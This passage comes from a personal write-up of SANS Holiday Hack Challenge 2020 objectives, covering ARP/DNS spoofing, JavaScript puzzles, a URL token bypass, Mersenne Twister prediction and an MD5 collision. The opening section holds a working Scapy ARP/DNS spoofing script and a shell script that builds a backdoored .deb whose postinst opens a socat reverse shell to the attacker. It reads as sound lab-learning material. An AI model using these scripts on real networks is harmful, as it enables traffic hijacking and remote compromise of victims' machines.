Modifying the provided python scripts to achieve the ARP spoofing is quite straightforward. The DNS part requires a bit more effort, but the provided pcap examples help a lot:

 1#!/usr/bin/python3
 2from scapy.all import *
 3import netifaces as ni
 4import uuid
 5
 6ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
 7macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
 8spoofed_ip = "10.6.6.53"
 9spoofed_domain = 'ftp.osuosl.org'
10
11def handle_pkt(packet):
12 response = None
13 if ARP in packet and packet[ARP].op == 1:
14 print(f"Spoofed APR response for {spoofed_ip} with own MAC {macaddr}")
15 ether_resp = Ether(dst=packet.hwsrc, type=0x806, src=macaddr)
16 arp_response = ARP(op=2, hwsrc=macaddr, hwdst=packet.hwsrc, psrc=spoofed_ip, pdst='10.6.6.35')
17 response = ether_resp / arp_response
18 else:
19 print(f"Spoofed DNS response for {spoofed_domain} with own IP {ipaddr}")
20 eth = Ether(src=macaddr, dst=packet[Ether].src)
21 ip = IP(dst=packet[IP].src, src=spoofed_ip)
22 udp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)
23 dns = DNS(
24 id=packet[DNS].id, rd=1, qdcount=1, ancount=1, qr=1, ra=1, qd=packet[DNS].qd,
25 an=DNSRR(rrname='ftp.osuosl.org', type='A', rclass='IN', rdata=ipaddr, ttl=82159)
26 )
27 response = eth / ip / udp / dns
28 sendp(response, iface="eth0", verbose=0)
29
30def main():
31 berkeley_packet_filter = "(" + " and ".join([
32 "udp dst port 53", "udp[10] & 0x80 = 0", "dst host {}".format(spoofed_ip), "ether dst host {}".format(macaddr)
33 ]) + ") or (arp[6:2] = 1)"
34 sniff(filter=berkeley_packet_filter, prn=handle_pkt, store=0, iface="eth0", count=0)
35
36if __name__ == "__main__":
37 main()

Next, following this guide I create the backdoored .deb package which will be served by my rogue web server. It is rather straightforward as I can reuse one of the existing packages on the terminal.

First, I make it work via netcat but then I change to socat because it’s able to establish a full-featured TTY instead of just the text output of the typed commands. This link offers great tips on setting up both netcat and socat in reverse shells!

To make it repeatable, I craft the below script that takes care of every step, including the creation of the backdoored package, the starting of the ARP & DNS spoofing script, the starting of the web server and finally starting the socat listener for accepting the reverse shell:

 1dpkg -x debs/socat_1.7.3.3-2_amd64.deb socat
 2ar -x debs/socat_1.7.3.3-2_amd64.deb
 3tar -xf control.tar.xz
 4rm control.tar.xz data.tar.xz debian-binary md5sums
 5
 6mkdir socat/DEBIAN
 7mv control socat/DEBIAN/
 8touch socat/DEBIAN/postinst
 9chmod 775 socat/DEBIAN/postinst
10LOCAL_IP=`ifconfig | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'`
11echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${LOCAL_IP}:4444" >> socat/DEBIAN/postinst
12dpkg-deb --build ./socat/
13
14mkdir -p pub/jfrost/backdoor
15mv socat.deb pub/jfrost/backdoor/suriv_amd64.deb
16
17python3 -m http.server 80 &>/dev/null & python3 spoof.py &>/dev/null &
18
19socat file:`tty`,raw,echo=0 tcp-listen:4444

Finally, I am able to open a full-featured TTY reverse shell and open the txt file to get the answer:

On to the next one! 😎

ARP Shenanigans

Sun, 27 Dec 2020 00:00:00 +0100

Initially, I have absolutely no clue how to get started on this. The description does not mention any elf to get hints, as for most previous challenges. I check Discord where I see a suggestion to solve the Elf Code terminal next to Ribb Bonbowford so I proceed with that:

Hello - my name is Ribb Bonbowford. Nice to meet you! Are you new to programming? It’s a handy skill for anyone in cyber security. This challenge centers around JavaScript. Take a look at this intro and see how far it gets you! Ready to move beyond elf commands? Don’t be afraid to mix in native JavaScript.

The game itself is quite simple at first:

The task is to use the character to collect all lollipops by solving challenges to unlock trapdoors and bribe munchkins. My workspace is a small text window where I can write JavaScript code, to give instructions to the character. Ribb has some further helpful thoughts to share:

Trying to extract only numbers from an array? Have you tried to filter? Maybe you need to enumerate an object’s keys and then filter? Getting hung up on number of lines? Maybe try to minify your code. Is there a way to push array items to the beginning of an array? Hmm… Maybe you need to enumerate an object’s keys and then filter? Getting hung up on number of lines? Maybe try to minify your code. Is there a way to push array items to the beginning of an array? Hmm…

Plus a few useful links that appeared in the badge:

Want to learn a useful language? JavaScript is a great place to start! You can also test out your code using a JavaScript playground.
Did you try the JavaScript primer? There’s a great section on looping.
There’s got to be a way to filter for specific typeof items in an array. Maybe the typeof operator could also be useful?
In JavaScript you can enumerate an object’s keys using keys, and filter the array using filter.

At first, I am not really getting the hang of it, but by the time I reach Level 4-5 I realize that it’s actually a pretty nice game that forces me to think about efficient solutions. Below is my code for the last two bonus levels:

// ---------Level 7 - Spiral -------- //
function sum(dataa) {
var sum = 0;
for (var i = 0; i < dataa.length; i++) {
for (var j = 0; j < dataa[i].length; j++) { if (typeof(dataa[i][j]) === 'number') sum += dataa[i][j] }
}
return sum
}
var index = 0;
for (i = 1; i <= 8; i++) {
if (index % 4 == 0) elf.moveDown(i)
if (index % 4 == 1) elf.moveLeft(i)
if (index % 4 == 2) elf.moveUp(i)
if (index % 4 == 3) elf.moveRight(i)
elf.pull_lever(i - 1)
index++
}
elf.moveUp(2); elf.moveLeft(4); elf.tell_munch(sum); elf.moveUp(1)
// --------Level 8 - Zig-Zag --------- //
function parser(input) {
var solution = ""
for (var i = 0; i < input.length; i++) {
item = input[i]
Object.keys(item).forEach(function(key, i) { if (item[key] === "lollipop") solution = key });
}
return solution
}
var leverSum = 0;
var counter = 0;
for (i of [1, 3, 5, 7, 9, 11]) {
if (counter % 2 == 0) elf.moveRight(i)
if (counter % 2 == 1) elf.moveLeft(i)
leverSum += elf.get_lever(counter)
elf.pull_lever(leverSum)
elf.moveUp(2)
counter++
}
elf.tell_munch(parser); elf.moveRight(11)

After all the levels are complete Ribb is ready to share some hints on the santavator:

Wow - are you a JavaScript developer? Great work! Hey, you know, you might use your JavaScript and HTTP manipulation skills to take a crack at bypassing the Santavator’s S4.

Wait a second, these are hints for Objective 4!!

Hmm, never mind it was a fun game after all… 🤓

I head back to the Santavator to inspect the Santavator again. My idea at this point is to visit it both as Santa and my non-Santa character to see how it behaves differently.

Next, I notice that the elevator window is loaded into an iframe with address elevator.kringlecastle.com. I proceed to investigate the javascript code that’s loaded and find the below section that is quite interesting:

This code makes an AJAX request in the background only if the button is powered (the S4 stream is functional) and the besanta token is present. Looking further into it I find the implementation of the hasToken() check:

// --- code from conduit.js --- //
const __PARSE_URL_VARS__ = () => {
let vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
vars[key] = value;
});
return vars;
}
// --- code from app.js --- //
const getParams = __PARSE_URL_VARS__();
let tokens = (getParams.tokens || '').split(',');
const hasToken = name => tokens.indexOf(name) !== -1;

Basically, it parses all the URL parameters and saves them into the tokens variable for later use. Looking further into the iframe I find where the tokens variable is populated and see that it contains besanta as I was looking at it in Santa mode:

It seems all I need to do is tweaking the iframe source to inject an extra besanta string to the tokens parameter while in non-Santa mode(!).

The plan works, and I successfully impersonate 🎅🏻 and bypass the fingerprint reader to visit Santa’s office in disguise. While there I take a nice selfie just for fun:

On to the next one! 😎

PS: In this moment, when the above selfie is taken, I finally understand why I chose this funky face for my avatar … 😛

Blockchain Investigation Part 1

Sun, 27 Dec 2020 00:00:00 +0100

At first glance, this seems like a tough one, so I go to talk with Tangle Coalbox in the Speaker Unpreparedness Room to get some help.

First though, he needs my help with his SnowBall Game terminat. He says that people were solving it on IMPOSSIBLE level, which should really be impossible:

Howdy Boss. You look a tad flushed. Can I get you some water from the vending machine? I’m still looking into the Snowball Game like you asked. I read the write-up of the test completed earlier this summer with the web socket vulnerabilities. I was able to complete the Easy level, but the Impossible level is, umm… I’d call it impossible, but I just saw someone beat it! Is it possible that the name a player provides influences how the forts are laid out? Oh, oh, maybe if I feed a Hard name into an Easy game I can manipulate it! UGH! on Impossible, the best I get are rejected player names in the page comments… maybe that’s useful? I’ll have to re-watch Tom Liston’s talk again ( LINK). Thanks for all the tips and encouragement Santa!

It seems I am tasked with solving the game on IMPOSSIBLE difficulty to see how the others have done it. Following Tangle’s advice, I watch the KringleCon talk by Tom Liston on PRNGs that offers essential information. To get started, I click on the machine which pops up the below welcome screen. I make sure to read the instructions very carefully, at least twice:

Levels Easy & Medium are indeed quite simple to solve without any trickery. It gets interesting once I start playing with the input box for my Name: this value is used as a seed for a random generator that creates the board. The same value always results in the same board setup.

On IMPOSSIBLE difficulty this value is redacted but I think there is a way I may try to predict it using the script from Tom Liston’s talk. To get to the redacted value I need a certain amount of random numbers generated to clone the internal state of the Mersenne Twister that’s used as the generator. Quite unexpectedly, there is a dump of discarded random values in the game’s page source:

Next I formulate the below plan to solve it on IMPOSSIBLE difficulty:

Start a new game on IMPOSSIBLE difficulty
Grab discarded random values from the HTML source
Feed these values to a modified version of Tim’s scipt to predict next value
Start a new game on EASY mode with the predicted number from step #2
Verify that both open games have identical setup by comparing your side of the table
Solve game on Easy mode manually, then replay it on the other game hitting only known cells
Collect hints from Tangle

The code I wrote is based on Tim’s python code, with the main changed to:

1if __name__ == "__main__":
2 my_random = mt19937(0)
3 with open("random.txt") as fp:
4 i = 0
5 for line in fp.readlines():
6 my_random.MT[i] = untemper(int(line))
7 i+=1
8 print(f"Next int: {my_random.extract_number()}")

First it creates a new instance of the Mersenne Twister, then loads the discarded random values from a file called random.txt and uses them to clone the internal state of the generator used to create the game board. Finally, it generates the next random number which is used to start a new game on EASY level so that I can figure out the cells I need to hit on IMPOSSIBLE:

Finally, Tangle is ready to share his hints:

Wow, it really was all about abusing the pseudo-random sequence! I’ve been thinking, do you think someone could try and cheat the Naughty/Nice Blockchain with this same technique? I remember you told us about how if you have control over to bytes in a file, it’s easy to create MD5 hash collisions. But the nonce would have to be known ahead of time. We know that the blockchain works by “chaining” blocks together. There’s no way you know who could change it without messing up the chain, right Santa? I’m going to look closer to spot if any of the blocks have been changed. If Jack was able to change the block AND the document without changing the hash… that would require a very UNIque hash COLLision. Apparently Jack was able to change just 4 bytes in the block to completely change everything about it. It’s like some sort of evil game to him. I think I need to review my Human Behavior Naughty/Niceness curriculum again.

I also get some useful links from him:

GitHub repo about MD5 Hash Collisions
GitHub repo about MD5 & SHA-1 cryptanalysis
Presentation on Hash Collisions Exploitations
KringleCon Talk from Prof. Qwerty Petabyte on Working with the Official Naughty/Nice Blockchain…

For some extra hints I stop by in Santa’s office to talk with Tinsel Upatree:

Howdy Santa! Just guarding the Naughty/Nice list on your desk. Santa, I don’t know if you’ve heard, but something is very, very wrong… We tabulated the latest score of the Naughty/Nice Blockchain. Jack Frost is the nicest being in the world! Jack Frost!?! As you know, we only really start checking the Naughty/Nice totals as we get closer to the holidays. Out of nowhere, Jack Frost has this crazy score… positive 4,294,935,958 nice points! No one has EVER gotten a score that high! No one knows how it happened. Most of us recall Jack having a NEGATIVE score only a few days ago… Worse still, his huge positive score seems to have happened way back in March. Our first thought was that he somehow changed the blockchain - but, as you know, that isn’t possible. We ran a validation of the blockchain and it all checks out. Even the smallest change to any block should make it invalid. Blockchains are huge, so we cut a one minute chunk from when Jack’s big score registered back in March. You can get a slice of the Naughty/Nice blockchain on your desk. You can get some tools to help you here. Tangle Coalbox, in the Speaker UNPreparedness room. has been talking with attendees about the issue.

Next I download the tools mentioned by Tinsel as well as the blockchain file which is necessary for solving the main objective.

The two pem files are not important so much for Objective11a. The bash script, and the Dockerfile are there just for the easy setup of an environment where the python script runs without dependency issues. With the provided python script I can interact with the blockchain.dat file and extract all the information needed for solving the objective.

The instructions tell me that the blockchain stops at index 129996, and my task is to predict the nonce for block 130000 and submit its HEX value in the badge. This naturally reminds me of the SnowBall Game, so I figure that the same script may be useful here too. I proceed to extract the nonce values from all the blocks and notice that there are roughly 1500 blocks altogether, plenty more than 624, so that’s good! Meanwhile, I also notice that these nonce values are much larger than the random values that I dealt with in the SnowBall Game. In fact, that game used 32 bit random integers, while this blockchain uses 64 bit integers as nonces.

Next I try to modify Tom Liston’s script to produce 64 bits random values instead of 32 bits. I eventually succeed in this following an example. However, the nonce it generates is not accepted. Next I get in touch with some fellow KringleCon attendees via Discord to discuss my approach to try see if I am in a rabbit hole or not.

Eventually I realize that the script does not need to be modified, as the sstem that created the blockchain also used a PRNG that produces 32 bit long random values. Rather, the nonce value in each block is constructed from two independent random values. Part of the challenge is to figure out how they are combined to turn them into a 64 bit random values.

Next I tweak the naughty_nice.py script to take the first 312 nonce values and feed them into the script from Tom Liston’s by splitting each nonce in half. By trial and error I figure out the correct method that’s implemented below:

 1c2 = Chain(load=True, filename='blockchain.dat')
 2
 3twister, i = mt19937(0), 0
 4for block in c2.blocks[:312]:
 5 twister.MT[i] = untemper(block.nonce & 0x00000000FFFFFFFF); i+=1
 6 twister.MT[i] = untemper(block.nonce >> 32); i+=1
 7
 8for block in c2.blocks[312:]:
 9 print(f"\nReal nonce: \t{block.nonce} at index {block.index}")
10 print(f"Predicted: \t{get_next(twister)}")
11
12for i in range(4):
13 print(f"Hex-#{i+129997}: \t{hex(get_next(twister))}")

The output shows that starting from block 313, all of the nonce values from the blocks are identical with the value produced by the cloned generator I created. Finally, I take the hex value for block 130000 and submit it in my badge, which is accepted:

 1...
 2Real nonce: 7556872674124112955 at index 129995
 3Predicted: 7556872674124112955
 4Real nonce: 16969683986178983974 at index 129996
 5Predicted: 16969683986178983974
 6
 7Hex-#129997: 0xb744baba65ed6fce
 8Hex-#129998: 0x1866abd00f13aed
 9Hex-#129999: 0x844f6b07bd9403e4
10Hex-#130000: 0x57066318f32f729d

On to the final objective! 😎

Blockchain Investigation Part 2

Sun, 27 Dec 2020 00:00:00 +0100

This final objective includes no new elves to talk with, so I have to rely on previous intel from Tinsel and Tangle who shared quite a lot already as part of Objective11a.

The main new piece of information for 11b is the SHA256 of the block that I need to inspect0 closer. It’s suspected that Jack has somehow managed to do the impossible and modify its content without breaking the blockchain. The hash of this block is:

58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f.

This final objective mentions that Jack possibly got away with this just by tweaking 4 bytes, so my focus is now to figure out where those 4 bytes may be hidingso that I can try to undo these changes.

There is a small amount of new information in the badge hints section:

Shinny Upatree swears that he doesn’t remember writing the contents of the document found in that block. Maybe looking closely at the documents, you might find something interesting.
If Jack was somehow able to change the contents of the block, AND the document without changing the hash… that would require a very UNIque hash COLLision.

These two hint at the fact that Jack has made two modifications, one in the block data structure and one in the attached PDF itself; and secondly that he has may have used the UNICOLL technique which has some very special properties when applied to MD5. The hint about UNICOLL only clicked for me after going through the lengthy slide deck from this presentation by Ange Albertini.

Armed with this knowledge I set out to inspect the block in question using the provided python script. I write a bit of code to loop through the whole chain until the block with correct SHA256 is found and then print it to the terminal and save it to file as block129459.dat:

1for i in range(len(chain.blocks)):
2 h = SHA256.new()
3 h.update(chain.blocks[i].block_data_signed())
4 if h.hexdigest() == '58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f':
5 print(chain.blocks[i])
6 chain.save_a_block(i, f"block{chain.blocks[i].index}.dat")

Below is a redacted version of this block as printed to terminal:

 1root@c288761e5038:/usr/src/app# python3 naughty_nice.py
 2Chain Index: 129459
 3 Nonce: a9447e5771c704f4
 4 PID: 0000000000012fd1
 5 RID: 000000000000020f
 6 Document Count: 2
 7 Score: ffffffff (4294967295)
 8 Sign: 1 (Nice)
 9 Data item: 1
10 Data Type: ff (Binary blob)
11 Data Length: 0000006c
12 Data: b'ea4...8d8f09'
13 Data item: 2
14 Data Type: 05 (PDF)
15 Data Length: 00009f57
16 Data: b'255...019a43'
17 Date: 03/24
18 Time: 13:21:41
19 PreviousHash: 4a91947439046c2dbaa96db38e924665
20 Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
21 Signature: b'MJIx...MCtHfw=='

There were several lines that stand at immediately as suspicious:

Line 7 is suspicious because of the maxed-out integer value. In the hints a different value is mentioned by Tinsel: 4,294,935,958 which corresponds to FFFF8596 which has two bytes difference from FFFFFFFF. However, this turns out to be a dead-end after realizing that this is not compatible with what I’ve learnt about the UNICOLL technique.
Line 8 is suspicious because Jack does not seem to be a trustworthy character, so perhaps he may have flipped the Nice/Naughty switch in the block to cheat the system. This suspicion is confirmed later when I extract the PDF and unlock the hidden content originally written by Shinny as a report on Jack’s Naughty behaviour!
Lines 10-11-12 are suspicious just because no other block contained two files, but I cannot immediately explain why this is significant
Line 17 is suspicious because I think that Jack might have tweaked the date to hide his activity and switched the month from December 24 to March 24. However, this seems to be a dead-end as well because it’s inconsistent with the UNICOLLL technique.

Next I set out to inspect the PDF document closer, which I extract to filesystem using the provided python script. After opening it in HexFiend I do not find anything suspicious at first, so I go back to the slide-deck from Ange to see if I can find some clues there, and I sure do:

This slide shows a trick that can be used to tweak contents of the PDF by changing which object or page is referenced. I try the same on the extracted PDF, and it’s content changes dramatically. It goes from a glowing report on Jack to this:

Earlier today, I saw this bloke Jack Frost climb into one of our cages and repeatedly kick a wombat.
I don’t know what’s with him... it’s like he’s a few stubbies short of a six-pack or somethin’.
I don’t think the wombat was actually hurt... but I tell ya, it was more ‘n a bit shook up.
Then the bloke climbs outtathe cage all laughin’ and cacklin’ like it was some kind of bonza joke.
Never in my life have I seen someone who was that bloody evil...
- ”Quote from a Sidney (Australia) Zookeeper
I have reviewed a surveillance video tape showing the incident and found that it does, indeed, show that
Jack Frost deliberately traveled to Australia just to attack this cute, helpless animal. It was appalling.
I tracked Frost down and found him in Nepal. I confronted him with the evidence and, surprisingly, he seems
to actually be incredibly contrite. He even says that he’ll give me access to a digital photo that shows his
“utterly regrettable” actions. Even more remarkably, he’s allowing me to use his laptop to generate this
report – because for some reason, my laptop won’t connect to the WiFi here.
He says that he’s sorry and needs to be “held accountable for his actions.” He’s even said that I should
give him the biggest Naughty/Nice penalty possible. I suppose he believes that by cooperating with me,
that I’ll somehow feel obliged to go easier on him. That’s not going to happen... I’m WAAAAY smarter than old Jack.
Oh man... while I was writing this up, I received a call from my wife telling me that one of the pipes inour
house back in the North Pole has frozen and water is leaking everywhere. How could that have happened?
Jack is telling me that I should hurry back home. He says I should save this document and then he’ll go ahead and submit the full report for me.
I’m not completely sure I trust him, but I’ll make myself a note and go in and check to make absolutely sure he submits this properly.
Shinny Upatree3/24/2020

Note: on MacOS I have to open this PDF in either Firefox or Chrome, because the built-in reader detects some corruption that prevents it from opening properly.

Once I have the hidden content I am sure that this is one of the 4 bytes that Jack has tweaked in the block.

Next I open the whole block in HexFiend to see it in its entirety. I spend many hours trying to find the two remaining bytes that Jack had tweaked. I am also in touch with some fellow HHC attendees who provide some great insight to help me avoid dead ends in my endeavors.

Eventually what helps me tremendously is the slide-deck from Ange and a tip from joergen to remember the 64 byte chunk sizes for MD5. This information combined with slide 113 eventually helps me find the remaining two bytes:

Turns out, due to some cryptographic properties of MD5, if you change some byte in Chunk N to +1, then you need to change the byte on the same location in Chunk N+1 to keep the MD5 hash the same. Finally, it clicks why there is a random binary file attached to the block. It is the extra random garbage that helps with the flipping of the Sign from Naughty to Nice while keeping the hash of the whole block unchanged.

Next I go back to HexFiend with the whole block open and modify the 4 bytes using this rule:

Tweaks explained:

byte 73 was 0x31 and I set it to 0x30 so that it becomes Naughty again
to keep the MD5 from changing, I then had to increase byte 137 by 1 from 0xD6 to 0xD7
byte 265 was 0x32 and I changed it to 0x33 to fix the PDF document
to keep the MD5 from changing, I then had to decrease byte 329 from 0x1C to 0x1B

Next, I use the docker image to get the MD5 and SHA256 values of the fixed block, and to my big surprise the MD5 remains unchanged:

1root@c288761e5038:/usr/src/app# md5sum block129459.dat
2b10b4a6bd373b61f32f4fd3a0cdfbf84
3root@c288761e5038:/usr/src/app# sha256sum block129459.dat
4fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

I then submit the SHA256 hash of the fixed block fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb and it is accepted as correct! 😎 🎉

Finally, I go up to the balcony in Santa’s Office to complete the narrative and join the party:

Acknowledgements

Sun, 10 Jan 2021 20:20:20 +0100

So that’s it! I just finished the Holiday Hack Challenge 2020 completely!

This is an especially rewarding feeling to have pulled this off for the 2nd year in a row. 2020 has been quite an unusual year, to say the least, for various reasons, good or bad. But this CTF at the very end of it is probably one of the most amazing ways to close it off on such a positive note.

Firstly, I would like to thank the folks at CounterHack and the SANS Institute for putting it together. Itás been such a tumultuous year, yet thez delivered such a high quality product for us. I am especially impressed by the smooth progression in the difficulty of the objectives, and of course all the creativity that went into creating them. Just simply amazing!

Secondly, I want to say thanks to all the peoople on Discord who helped me with gentle nudges in desperate times. I probably would have lost much more hair and finished it much later, if it weren’t for you gals:

joergen
shahla
john_r2
legacyboy
tw2k

Last but not least, I want to thank my family who allowed me to work on these objectives throughout most of the holiday season… 😇

Already looking forward to what HHC 2021 will have in store!